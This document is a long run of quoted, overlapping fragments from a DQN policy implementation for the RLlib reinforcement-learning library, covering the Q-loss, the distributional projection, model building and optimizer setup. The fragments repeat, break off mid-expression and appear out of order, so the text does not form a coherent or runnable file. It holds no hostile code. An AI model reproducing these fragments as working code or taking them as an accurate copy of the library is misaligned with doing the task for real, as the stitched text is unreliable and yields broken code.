add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model, TorchCategorical def get_distribution_inputs_and_class(", "n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if num_atoms > 1: # Distributional", "torch.sum( l_project * torch.unsqueeze(ml_delta, -1), dim=1) mu_delta = torch.sum( u_project", "ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist import", "* q_tp1_best_masked # compute the error (potentially clipped) self.td_error =", "num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"],", "rew_t, obs_tp1, done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] =", "after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> None:", "import ModelCatalog from ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical,", "to add LayerNorm after each Dense # generically into ModelCatalog.", "= ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else: num_outputs =", "q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best =", "estimate of best possible value starting from state at t", "# Move target net to device (this is done autoatically", "import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog", "torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1) q_logits_t_selected", "{\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init, mixins=[ TargetNetworkMixin, ComputeTDErrorMixin, LearningRateSchedule, ])", "= F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms, num_atoms) u_project = F.one_hot(ub.long(),", "ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import Policy", "config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy: Policy, config: TrainerConfigDict)", "self.q_loss.td_error self.compute_td_error = compute_td_error def build_q_model_and_distribution( policy: Policy, obs_space: gym.Space,", "loss z = torch.range(0.0, num_atoms - 1, dtype=torch.float32) z =", "using this cross entropy loss for # priority is robust", "self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] =", "q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats = {", "import try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from", "to update td error attribute build_q_losses(self, self.model, None, input_dict) return", "# Target Q-network evaluation. 
q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values( policy,", "F = nn.functional class QLoss: def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best,", "Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"])", "- b + floor_equal_ceil) mu_delta = q_probs_tp1_best * (b -", "torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1,", "nn = try_import_torch() F = None if nn: F =", "else: (action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score =", "- done_mask) * q_tp1_best # compute RHS of bellman equation", "Q scores for actions which we know were selected in", "each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables()", "implementations # when b happens to be an integer, lb", "compute RHS of bellman equation q_t_selected_target = rewards + gamma**n_step", "= action_scores - torch.unsqueeze( advantages_mean, 1) value = state_score +", "(r_tau - v_min) / ((v_max - v_min) / float(num_atoms -", "return self.q_loss.td_error self.compute_td_error = compute_td_error def build_q_model_and_distribution( policy: Policy, obs_space:", "dim=1) m = ml_delta + mu_delta # Rainbow paper claims", "obs_space, action_space, config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def", "support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered support_prob_per_action", "q_t_selected = torch.sum( torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) *", "after each Dense # generically into ModelCatalog. add_layer_norm = (", "isinstance(q_vals, tuple) else q_vals policy.q_values = q_vals return policy.q_values, TorchCategorical,", "1) q_logits_t_selected = torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1) #", "ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask, importance_weights):", "action_space: gym.Space, config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space,", "the error (potentially clipped) self.td_error = q_t_selected - q_t_selected_target.detach() self.loss", "num_atoms > 1: # Distributional Q-learning which corresponds to an", "= torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats = { \"mean_q\": torch.mean(q_t_selected),", "policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device))", "Q-network evaluation. 
q_t, q_logits_t, q_probs_t = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS],", "if config[\"num_atoms\"] > 1: (action_scores, z, support_logits_per_action, logits, probs_or_logits) =", "q_logits_t_selected = torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1) # compute", "nn.functional class QLoss: def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights,", "= nn.functional.softmax( support_logits_per_action) value = torch.sum(z * support_prob_per_action, dim=-1) logits", "> FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best =", "/ ((v_max - v_min) / float(num_atoms - 1)) lb =", "done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS]", "import LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException", "device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection,", "torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class ComputeTDErrorMixin: def __init__(self):", "True else: num_outputs = action_space.n # TODO(sven): Move option to", "value = state_score + advantages_centered else: value = action_scores return", "= torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss = QLoss(", "* torch.unsqueeze( 1.0 - done_mask, -1) * torch.unsqueeze(z, 0) r_tau", "typing import Dict, List, Tuple import gym import ray from", "+ floor_equal_ceil) mu_delta = q_probs_tp1_best * (b - lb) ml_delta", "def build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]: return dict({ \"cur_lr\":", "ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits)", "num_atoms) # (batch_size, num_atoms, num_atoms) u_project = F.one_hot(ub.long(), num_atoms) ml_delta", "rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] = importance_weights", "loss to update td error attribute build_q_losses(self, self.model, None, input_dict)", "train_batch: SampleBatch) -> TensorType: config = policy.config # Q-network evaluation.", "device (this is done autoatically for the # policy.model, but", "= model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean = torch.mean( support_logits_per_action,", "name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn,", "model_out, state = model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training, }, [],", "u_project = F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best * (ub -", "num_outputs = action_space.n # TODO(sven): Move option to add LayerNorm", "q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1) q_logits_t_selected = torch.sum( q_logits_t", "get_default_config=lambda: 
ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy:", "not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space {} is not", "action_space, config) # Move target net to device (this is", "ml_delta = q_probs_tp1_best * (ub - b + floor_equal_ceil) mu_delta", "for any other models the policy has). policy.target_q_model = policy.target_q_model.to(policy.device)", "= True else: num_outputs = action_space.n # TODO(sven): Move option", "= q_probs_tp1_best * (ub - b + floor_equal_ceil) mu_delta =", "torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class ComputeTDErrorMixin:", "explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n)", "into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model, TorchCategorical def", "TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy:", "= compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net,", "if nn: F = nn.functional class QLoss: def __init__(self, q_t_selected,", "scores for actions which we know were selected in the", "lb < 0.5).float() # (batch_size, num_atoms, num_atoms) l_project = F.one_hot(lb.long(),", "[] # state-out def build_q_losses(policy: Policy, model, _, train_batch: SampleBatch)", "q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True)", "= softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error * importance_weights) self.stats", "q_probs_tp1 = compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q", "compute estimate of best possible value starting from state at", "train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy:", "- 1) # (batch_size, 1) * (1, num_atoms) = (batch_size,", "True, is_training: bool = False, **kwargs) -> Tuple[TensorType, type, List[TensorType]]:", "gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space,", "Dict[str, TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses,", "TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config) # Move", "is_training: bool = False, **kwargs) -> Tuple[TensorType, type, List[TensorType]]: q_vals", "(batch_size, num_atoms) r_tau = torch.unsqueeze( rewards, -1) + gamma**n_step *", "option to add LayerNorm after each Dense # 
generically into", "starting from state at t + 1 if config[\"double_q\"]: q_tp1_using_online_net,", "ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template import", "logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType) ->", "insensitive to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss =", "importance_weights) self.stats = { # TODO: better Q stats for", "or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs,", "1) else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best =", "= torch.sum( l_project * torch.unsqueeze(ml_delta, -1), dim=1) mu_delta = torch.sum(", "explore=False, is_training=True) # Target Q-network evaluation. q_tp1, q_logits_tp1, q_probs_tp1 =", "explore: bool = True, is_training: bool = False, **kwargs) ->", "_, train_batch: SampleBatch) -> TensorType: config = policy.config # Q-network", "import ParameterNoise from ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN,", "-> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy,", "\"is_training\": is_training, }, [], None) if config[\"num_atoms\"] > 1: (action_scores,", "from state at t + 1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net,", "of bellman equation q_t_selected_target = rewards + gamma**n_step * q_tp1_best_masked", "policy.target_q_model.variables() return policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy: Policy, model: ModelV2,", "Clip grads if configured. return apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy:", "None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config) # Move target net", "add_layer_norm = ( isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"] ==", "-1), dim=1) m = ml_delta + mu_delta # Rainbow paper", "from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import Policy from", "# generically into ModelCatalog. 
add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model,", "for DQN.\".format(action_space)) if config[\"hiddens\"]: # try to infer the last", "q_vals policy.q_values = q_vals return policy.q_values, TorchCategorical, [] # state-out", "ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config) # Move target net to", "(TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch import SampleBatch", "torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action) value", "supported for DQN.\".format(action_space)) if config[\"hiddens\"]: # try to infer the", "policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection =", "from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE,", "[], None) if config[\"num_atoms\"] > 1: (action_scores, z, support_logits_per_action, logits,", "q_vals = compute_q_values(policy, model, obs_batch, explore, is_training) q_vals = q_vals[0]", "(b-lb) == 0. floor_equal_ceil = (ub - lb < 0.5).float()", "**kwargs) -> Tuple[TensorType, type, List[TensorType]]: q_vals = compute_q_values(policy, model, obs_batch,", "import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel", "def after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) ->", "sigma0=config[\"sigma0\"], # TODO(sven): Move option to add LayerNorm after each", "policy.config # Q-network evaluation. 
q_t, q_logits_t, q_probs_t = compute_q_values( policy,", "num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"],", "None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space: gym.Space, action_space:", "= torch.range(0.0, num_atoms - 1, dtype=torch.float32) z = v_min +", "extra_action_out_fn(policy: Policy, input_dict, state_batches, model, action_dist) -> Dict[str, TensorType]: return", "mu_delta = q_probs_tp1_best * (b - lb) ml_delta = torch.sum(", "* (1, num_atoms) = (batch_size, num_atoms) r_tau = torch.unsqueeze( rewards,", "1) * (1, num_atoms) = (batch_size, num_atoms) r_tau = torch.unsqueeze(", "* torch.unsqueeze(ml_delta, -1), dim=1) mu_delta = torch.sum( u_project * torch.unsqueeze(mu_delta,", "1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 >", "self.model, None, input_dict) return self.q_loss.td_error self.compute_td_error = compute_td_error def build_q_model_and_distribution(", "config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy: Policy,", "is_training: bool = False): config = policy.config model_out, state =", "claims that using this cross entropy loss for # priority", "try to infer the last layer size, otherwise fall back", "the # policy.model, but not for any other models the", "model: ModelV2, obs: TensorType, explore, is_training: bool = False): config", "compute_q_values(policy: Policy, model: ModelV2, obs: TensorType, explore, is_training: bool =", "otherwise fall back to 256 num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1]", "name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven):", "gym.Space, config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config)", "compute_td_error def build_q_model_and_distribution( policy: Policy, obs_space: gym.Space, action_space: gym.Space, config:", "add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs,", "TorchDistributionWrapper) from ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch import SampleBatch from", "will # be discarded because (ub-b) == (b-lb) == 0.", "TensorType]: # Clip grads if configured. 
return apply_grad_clipping(policy, optimizer, loss)", "= (ub - lb < 0.5).float() # (batch_size, num_atoms, num_atoms)", "entropy loss z = torch.range(0.0, num_atoms - 1, dtype=torch.float32) z", "Q-learning which corresponds to an entropy loss z = torch.range(0.0,", "a*) will # be discarded because (ub-b) == (b-lb) ==", "num_atoms) u_project = F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best * (ub", "torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1", "= build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio,", "= torch.ceil(b) # Indispensable judgement which is missed in most", "clipped) self.td_error = q_t_selected - q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float()", "(potentially clipped) self.td_error = q_t_selected - q_t_selected_target.detach() self.loss = torch.mean(", "return policy.q_values, TorchCategorical, [] # state-out def build_q_losses(policy: Policy, model,", "policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]:", "= q_probs_tp1_best * (b - lb) ml_delta = torch.sum( l_project", "1) # compute estimate of best possible value starting from", "action_scores - torch.unsqueeze( advantages_mean, 1) value = state_score + advantages_centered", "lb == ub, so pr_j(s', a*) will # be discarded", "else: num_outputs = action_space.n # TODO(sven): Move option to add", "F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best * (ub - b +", "obs_batch: TensorType, *, explore: bool = True, is_training: bool =", "train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q scores for actions which we", "return value, logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss:", "config[\"dueling\"]: state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean =", "mu_delta = torch.sum( u_project * torch.unsqueeze(mu_delta, -1), dim=1) m =", "on loss to update td error attribute build_q_losses(self, self.model, None,", "float(num_atoms - 1)) lb = torch.floor(b) ub = torch.ceil(b) #", "generically into ModelCatalog. 
add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2(", "be an integer, lb == ub, so pr_j(s', a*) will", "batch) -> Dict[str, TensorType]: return dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats)", "- lb) ml_delta = torch.sum( l_project * torch.unsqueeze(ml_delta, -1), dim=1)", "v_max=10.0): if num_atoms > 1: # Distributional Q-learning which corresponds", "fall back to 256 num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"]", "\"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class ComputeTDErrorMixin: def __init__(self): def", "torch.range(0.0, num_atoms - 1, dtype=torch.float32) z = v_min + z", "importance_weights # Do forward pass on loss to update td", "return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy, batch) ->", "= nn.functional class QLoss: def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best,", "to infer the last layer size, otherwise fall back to", "use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move option to add", "import TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2 import ModelV2", "q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection", "policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model: ModelV2, obs: TensorType, explore, is_training:", "torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss = QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best,", "to 256 num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True", "- q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats =", "# TODO(sven): Move option to add LayerNorm after each Dense", "state-out def build_q_losses(policy: Policy, model, _, train_batch: SampleBatch) -> TensorType:", "advantages_mean, 1) value = state_score + advantages_centered else: value =", "== 0. 
floor_equal_ceil = (ub - lb < 0.5).float() #", "is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best", "1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values( policy,", "policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel,", "stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins,", "policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q scores for actions", "= ml_delta + mu_delta # Rainbow paper claims that using", "# compute estimate of best possible value starting from state", "support_logits_per_action_centered = ( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action =", "= self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS]", "= q_vals[0] if isinstance(q_vals, tuple) else q_vals policy.q_values = q_vals", "rewards + gamma**n_step * q_tp1_best_masked # compute the error (potentially", "layer size, otherwise fall back to 256 num_outputs = ([256]", "support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered = ( support_logits_per_action -", "value = action_scores return value, logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy,", "action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"],", "UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework import try_import_torch from", "policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy: Policy, obs_space, action_space, config: TrainerConfigDict)", "def setup_early_mixins(policy: Policy, obs_space, action_space, config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy,", "LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException from", "Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import", "1) q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss", "probs_or_logits = support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1) advantages_centered =", "obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"],", 
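The num_atoms > 1 branch above is the C51 projection: the Bellman-shifted support r + gamma**n_step * (1 - done) * z is re-binned onto the fixed atoms by splitting each atom's probability between its floor and ceiling bins. A minimal standalone sketch of that projection follows; the numbers are illustrative and not taken from the policy file:

import torch
import torch.nn.functional as F

# Project a next-state return distribution onto 5 fixed atoms (C51-style),
# mirroring the floor/ceil scatter in QLoss above.
num_atoms, v_min, v_max, gamma = 5, -2.0, 2.0, 0.9
z = torch.linspace(v_min, v_max, num_atoms)        # fixed support
p_tp1 = torch.tensor([[0.1, 0.2, 0.4, 0.2, 0.1]])  # pr(z | s', a*)
reward, done = torch.tensor([0.5]), torch.tensor([0.0])

r_tau = reward.unsqueeze(-1) + gamma * (1.0 - done).unsqueeze(-1) * z
r_tau = torch.clamp(r_tau, v_min, v_max)
b = (r_tau - v_min) / ((v_max - v_min) / float(num_atoms - 1))
lb, ub = torch.floor(b), torch.ceil(b)
floor_equal_ceil = (ub - lb < 0.5).float()  # keep mass when b is integral

l_project = F.one_hot(lb.long(), num_atoms).float()
u_project = F.one_hot(ub.long(), num_atoms).float()
ml = torch.sum(l_project * (p_tp1 * (ub - b + floor_equal_ceil)).unsqueeze(-1),
               dim=1)
mu = torch.sum(u_project * (p_tp1 * (b - lb)).unsqueeze(-1), dim=1)
m = ml + mu
print(m, m.sum())  # still a valid distribution: sums to 1

Running this prints a projected distribution whose mass still sums to 1; that invariant is exactly what the floor_equal_ceil correction protects when b lands on an atom boundary.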
"config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS],", "else q_vals policy.q_values = q_vals return policy.q_values, TorchCategorical, [] #", "model, _, train_batch: SampleBatch) -> TensorType: config = policy.config #", "Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return", "config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy: Policy, config:", "optimizer, loss) def extra_action_out_fn(policy: Policy, input_dict, state_batches, model, action_dist) ->", "TrainerConfigDict torch, nn = try_import_torch() F = None if nn:", "+ config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else: num_outputs = action_space.n #", "be discarded because (ub-b) == (b-lb) == 0. floor_equal_ceil =", "dtype=torch.float32) z 